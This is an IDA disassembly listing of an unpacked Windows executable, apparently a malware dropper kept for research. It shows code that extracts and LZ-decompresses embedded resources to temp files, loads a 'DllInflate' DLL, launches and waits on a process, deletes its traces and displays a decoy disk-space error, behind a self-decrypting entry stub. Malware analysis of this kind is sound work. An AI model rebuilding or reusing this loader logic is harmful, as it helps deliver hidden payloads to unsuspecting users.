;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 08E98306BFA752C5E7B1226714EE0372
; File Name : u:\work\08e98306bfa752c5e7b1226714ee0372_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000076E ( 1902.)
; Section size in file : 0000076E ( 1902.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dword_401000 dd 77E74155h ; DATA XREF: sub_40122B+127�r
dword_401004 dd 77E760B5h ; DATA XREF: sub_4010EE+2B�r
dword_401008 dd 77E7105Fh ; DATA XREF: sub_4010EE+1C�r
dword_40100C dd 77E6CA8Ah ; DATA XREF: sub_4010EE+B�r
dword_401010 dd 77E77963h ; DATA XREF: sub_401128+46�r
; sub_40122B+193�r
dword_401014 dd 77E79D8Ch ; DATA XREF: sub_401128+36�r
dword_401018 dd 77E7A837h ; DATA XREF: sub_401128+19�r
dword_40101C dd 77E6AF8Fh ; DATA XREF: sub_40117E+F�r
dword_401020 dd 77E73628h ; DATA XREF: sub_401194+8A�r
; sub_40122B+CB�r ...
dword_401024 dd 77E61BE6h ; DATA XREF: sub_40122B+1C6�r
dword_401028 dd 77E7FF65h ; DATA XREF: sub_40122B+1AC�r
dword_40102C dd 77E79D5Bh ; DATA XREF: sub_40122B+1A0�r
dword_401030 dd 77E61BB8h ; DATA XREF: sub_40122B+179�r
dword_401034 dd 77E6177Ah ; DATA XREF: sub_40122B+159�r
dword_401038 dd 77E7C931h ; DATA XREF: sub_4010EE+32�r
dword_40103C dd 77E73167h ; DATA XREF: sub_40122B+121�r
dword_401040 dd 77E7C938h ; DATA XREF: sub_40122B:loc_40131B�r
dword_401044 dd 77E80618h ; DATA XREF: sub_40122B+BE�r
; sub_40122B+E1�r
dword_401048 dd 77E7A5FDh ; DATA XREF: sub_40122B+70�r
dword_40104C dd 77E805D8h ; DATA XREF: sub_40122B+5A�r
dword_401050 dd 77E705B0h ; DATA XREF: .text:00401469�r
dword_401054 dd 77E7A099h ; DATA XREF: .text:0040141D�r
dd 0
dword_40105C dd 77EB2DBFh ; DATA XREF: sub_4014AE�r
dword_401060 dd 77EBB626h ; DATA XREF: sub_4014B4�r
dword_401064 dd 77EBBA18h ; DATA XREF: sub_4014A8�r
dd 0
dword_40106C dd 77D6ADD7h ; DATA XREF: .text:0040149C�r
dd 0
dword_401074 dd 657873h ; DATA XREF: sub_40117E+6�o
dd 2022h ; DATA XREF: sub_40122B+143�o
dword_40107C dd 22h ; DATA XREF: sub_40122B+11B�o
aDllinflate db 'DllInflate',0 ; DATA XREF: sub_40122B+6A�o
align 4
aAnErrorHasOccu db 'An error has occured while executing this program. Free up harddr'
; DATA XREF: .text:00401495�o
db 'ive space and try again.',0
align 4
aError db 'Error',0 ; DATA XREF: .text:00401490�o
; =============== S U B R O U T I N E =======================================
sub_4010EE proc near ; CODE XREF: sub_40122B+19�p
; sub_40122B+82�p
arg_0 = word ptr 4
arg_4 = dword ptr 8
movzx eax, [esp+arg_0]
push esi
push 63h
push eax
push 0
call dword_40100C ; FindResourceA
mov esi, eax
test esi, esi
jnz short loc_401107
pop esi
retn
; ---------------------------------------------------------------------------
loc_401107: ; CODE XREF: sub_4010EE+15�j
push esi
push 0
call dword_401008 ; SizeofResource
mov ecx, [esp+4+arg_4]
push esi
push 0
mov [ecx], eax
call dword_401004 ; LoadResource
push eax
call dword_401038 ; LockResource
pop esi
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401128 proc near ; CODE XREF: sub_401194+27�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
push edi
push esi
push 80h
push 2
push esi
push esi
push 40000000h
push [ebp+arg_8]
call dword_401018 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_401178
mov [ebp+arg_8], esi
push esi
mov esi, [ebp+arg_4]
lea eax, [ebp+arg_8]
push eax
push esi
push [ebp+arg_0]
push edi
call dword_401014 ; WriteFile
test eax, eax
jz short loc_401178
cmp esi, [ebp+arg_8]
jnz short loc_401178
push edi
call dword_401010 ; CloseHandle
mov al, 1
jmp short loc_40117A
; ---------------------------------------------------------------------------
loc_401178: ; CODE XREF: sub_401128+24�j
; sub_401128+3E�j ...
xor al, al
loc_40117A: ; CODE XREF: sub_401128+4E�j
pop edi
pop esi
pop ebp
retn
sub_401128 endp
; =============== S U B R O U T I N E =======================================
sub_40117E proc near ; CODE XREF: sub_401194+15�p
; sub_40122B+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push 0
push offset dword_401074
push [esp+0Ch+arg_0]
call dword_40101C ; GetTempFileNameA
retn
sub_40117E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401194 proc near ; CODE XREF: sub_40122B+43�p
; sub_40122B+AC�p
; DATA XREF: ...
var_18C = byte ptr -18Ch
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18Ch
push esi
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_8]
call sub_40117E
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401128
add esp, 14h
test al, al
jz short loc_401207
lea eax, [ebp+var_18C]
push 0
push eax
lea eax, [ebp+var_104]
push eax
call sub_4014B4 ; LZOpenFileA
mov edi, eax
test edi, edi
jl short loc_401207
lea eax, [ebp+var_18C]
push 1002h
push eax
push [ebp+arg_C]
call sub_4014B4 ; LZOpenFileA
mov esi, eax
test esi, esi
jl short loc_401207
push esi
push edi
call sub_4014AE ; LZCopy
test eax, eax
jge short loc_40120B
loc_401207: ; CODE XREF: sub_401194+31�j
; sub_401194+4C�j ...
xor eax, eax
jmp short loc_401227
; ---------------------------------------------------------------------------
loc_40120B: ; CODE XREF: sub_401194+71�j
push edi
call sub_4014A8 ; LZClose
push esi
call sub_4014A8 ; LZClose
lea eax, [ebp+var_104]
push eax
call dword_401020 ; DeleteFileA
push 1
pop eax
loc_401227: ; CODE XREF: sub_401194+75�j
pop edi
pop esi
leave
retn
sub_401194 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40122B proc near ; CODE XREF: .text:00401456�p
; .text:0040147E�p
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = byte ptr -58h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 364h
push ebx
push esi
lea eax, [ebp+var_4]
push edi
push eax
push 1
xor esi, esi
mov ebx, offset sub_401194
call sub_4010EE
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4012A7
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
call sub_40117E
lea eax, [ebp+var_260]
push eax
push [ebp+arg_0]
push [ebp+var_4]
push edi
call sub_401194
add esp, 18h
test eax, eax
jz loc_4013B7
lea eax, [ebp+var_260]
push eax
call dword_40104C ; LoadLibraryA
mov esi, eax
test esi, esi
jz loc_4013B7
push offset aDllinflate ; "DllInflate"
push esi
call dword_401048 ; GetProcAddress
mov ebx, eax
test ebx, ebx
jz short loc_4012E0
loc_4012A7: ; CODE XREF: sub_40122B+24�j
lea eax, [ebp+var_4]
push eax
push 2
call sub_4010EE
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4012E0
lea eax, [ebp+var_364]
push eax
push [ebp+arg_0]
call sub_40117E
lea eax, [ebp+var_364]
push eax
push [ebp+arg_0]
push [ebp+var_4]
push edi
call ebx ; sub_401194
add esp, 18h
test eax, eax
jnz short loc_401301
loc_4012E0: ; CODE XREF: sub_40122B+7A�j
; sub_40122B+8D�j
test esi, esi
jz loc_4013B7
push esi
call dword_401044 ; FreeLibrary
lea eax, [ebp+var_260]
push eax
call dword_401020 ; DeleteFileA
jmp loc_4013B7
; ---------------------------------------------------------------------------
loc_401301: ; CODE XREF: sub_40122B+B3�j
mov ebx, dword_401020
test esi, esi
jz short loc_40131B
push esi
call dword_401044 ; FreeLibrary
lea eax, [ebp+var_260]
push eax
call ebx ; DeleteFileA
loc_40131B: ; CODE XREF: sub_40122B+DE�j
call dword_401040 ; GetCommandLineA
mov edi, eax
xor cl, cl
cmp byte ptr [edi], 22h
jnz short loc_40132D
inc cl
loc_40132C: ; CODE XREF: sub_40122B+112�j
inc edi
loc_40132D: ; CODE XREF: sub_40122B+FD�j
mov al, [edi]
test al, al
jz short loc_401340
cmp al, 20h
jnz short loc_40133B
test cl, cl
jz short loc_401340
loc_40133B: ; CODE XREF: sub_40122B+10A�j
cmp al, 22h
jnz short loc_40132C
inc edi
loc_401340: ; CODE XREF: sub_40122B+106�j
; sub_40122B+10E�j
lea eax, [ebp+var_15C]
push offset dword_40107C
push eax
call dword_40103C ; lstrcpy
mov esi, dword_401000
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_15C]
push eax
call esi ; lstrcat
lea eax, [ebp+var_15C]
push offset dword_401078
push eax
call esi ; lstrcat
lea eax, [ebp+var_15C]
push edi
push eax
call esi ; lstrcat
lea eax, [ebp+var_58]
push eax
call dword_401034 ; GetStartupInfoA
lea eax, [ebp+var_14]
xor edi, edi
push eax
lea eax, [ebp+var_58]
push eax
push edi
push edi
push 20h
push 1
push edi
lea eax, [ebp+var_15C]
push edi
push eax
push edi
call dword_401030 ; CreateProcessA
test eax, eax
jnz short loc_4013BB
lea eax, [ebp+var_364]
push eax
call ebx ; DeleteFileA
loc_4013B7: ; CODE XREF: sub_40122B+4D�j
; sub_40122B+64�j ...
xor al, al
jmp short loc_4013FF
; ---------------------------------------------------------------------------
loc_4013BB: ; CODE XREF: sub_40122B+181�j
push [ebp+var_10]
mov esi, dword_401010
call esi ; CloseHandle
push 0FFFFFFFFh
push [ebp+var_14]
call dword_40102C ; WaitForSingleObject
push [ebp+arg_4]
push [ebp+var_14]
call dword_401028 ; GetExitCodeProcess
push [ebp+var_14]
call esi ; CloseHandle
loc_4013E2: ; CODE XREF: sub_40122B+1D0�j
lea eax, [ebp+var_364]
push eax
call ebx ; DeleteFileA
test eax, eax
jnz short loc_4013FD
push 64h
call dword_401024 ; Sleep
inc edi
cmp edi, 64h
jl short loc_4013E2
loc_4013FD: ; CODE XREF: sub_40122B+1C2�j
mov al, 1
loc_4013FF: ; CODE XREF: sub_40122B+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40122B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20Ch
push esi
mov esi, 104h
lea eax, [ebp-108h]
push esi
push eax
push 0
call dword_401054 ; GetModuleFileNameA
mov cl, [ebp-108h]
xor edx, edx
test cl, cl
lea eax, [ebp-108h]
jz short loc_40144B
loc_401435: ; CODE XREF: .text:00401443�j
cmp cl, 5Ch
jnz short loc_40143D
lea edx, [eax+1]
loc_40143D: ; CODE XREF: .text:00401438�j
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_401435
test edx, edx
jz short loc_40144B
and [edx], cl
loc_40144B: ; CODE XREF: .text:00401433�j
; .text:00401447�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-108h]
push eax
call sub_40122B
pop ecx
test al, al
pop ecx
jnz short loc_401489
lea eax, [ebp-20Ch]
push esi
push eax
call dword_401050 ; GetWindowsDirectoryA
test eax, eax
jz short loc_40148E
lea eax, [ebp-4]
push eax
lea eax, [ebp-20Ch]
push eax
call sub_40122B
pop ecx
test al, al
pop ecx
jz short loc_40148E
loc_401489: ; CODE XREF: .text:0040145F�j
mov eax, [ebp-4]
jmp short loc_4014A5
; ---------------------------------------------------------------------------
loc_40148E: ; CODE XREF: .text:00401471�j
; .text:00401487�j
push 0
push offset aError ; "Error"
push offset aAnErrorHasOccu ; "An error has occured while executing th"...
push 0
call dword_40106C ; MessageBoxA
or eax, 0FFFFFFFFh
loc_4014A5: ; CODE XREF: .text:0040148C�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014A8 proc near ; CODE XREF: sub_401194+78�p
; sub_401194+7E�p
jmp dword_401064
sub_4014A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014AE proc near ; CODE XREF: sub_401194+6A�p
jmp dword_40105C
sub_4014AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4014B4 proc near ; CODE XREF: sub_401194+43�p
; sub_401194+5D�p
jmp dword_401060
sub_4014B4 endp
; ---------------------------------------------------------------------------
align 4
dword_4014BC dd 1554h, 2 dup(0) ; DATA XREF: start+7�o
dd 16ECh, 1000h, 1568h, 2 dup(0)
dd 171Ch, 105Ch, 1578h, 2 dup(0)
dd 1734h, 106Ch, 5 dup(0)
dd 1664h, 1590h, 15A0h, 15B2h, 15C2h, 15D0h, 15DCh, 15EAh
dd 15FEh, 160Ch, 1614h, 162Ah, 1640h, 1652h, 1580h, 1670h
dd 167Ch, 168Eh, 169Ch, 16AEh, 16BEh, 16D6h, 0
dd 1704h, 170Eh, 16FAh, 0
dd 1726h, 0
db 0D5h ; Õ
db 1, 4Ch, 6Fh
aCkresource db 'ckResource',0
align 10h
db 0C7h ; Ç
db 1, 4Ch, 6Fh
aAdresource db 'adResource',0
align 10h
db 95h ; •
db 2, 53h, 69h
aZeofresource db 'zeofResource',0
align 2
aG db '£',0
aFindresourcea db 'FindResourceA',0
db 1Bh,0
aClosehandle db 'CloseHandle',0
db 0DFh ; ß
db 2, 57h, 72h
aItefile db 'iteFile',0
a4 db '4',0
aCreatefilea db 'CreateFileA',0
dw 163h
aGettempfilenam db 'GetTempFileNameA',0
align 2
aW db 'W',0
aDeletefilea db 'DeleteFileA',0
db 96h ; –
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0Bh
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 2CEh
aWaitforsingleo db 'WaitForSingleObject',0
aD db 'D',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 150h
aGetstartupinfo db 'GetStartupInfoA',0
dd 736C02F9h, 61637274h, 4174h, 736C0302h, 70637274h, 4179h
dd 654700CAh, 6D6F4374h, 646E616Dh, 656E694Ch, 0B40041h
dd 65657246h, 7262694Ch, 797261h, 6547013Eh, 6F725074h
dd 64644163h, 73736572h, 1C20000h, 64616F4Ch, 7262694Ch
dd 41797261h, 17D0000h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 124h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aKernel32_dll db 'KERNEL32.dll',0
align 2
dw 3
aLzclose db 'LZClose',0
dd 5A4C0004h, 79706F43h, 70000h, 704F5A4Ch, 69466E65h
dd 41656Ch, 32335A4Ch, 6C6C642Eh, 1BE0000h, 7373654Dh
dd 42656761h, 41786Fh, 52455355h, 642E3233h, 6C6Ch, 90909090h
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
push ebx
push ecx
mov ebx, 449h
mov edx, offset dword_4014BC
loc_401751: ; CODE XREF: start+1D�j
mov cl, [edx]
rol cl, 7
ror cl, 2
sub cl, dl
xor cl, 91h
mov [edx], cl
dec edx
dec ebx
jnz short loc_401751
pop ecx
pop ebx
add edx, 391h
jmp edx
start endp
_text ends
; Section 3. (virtual address 00016000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 416000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start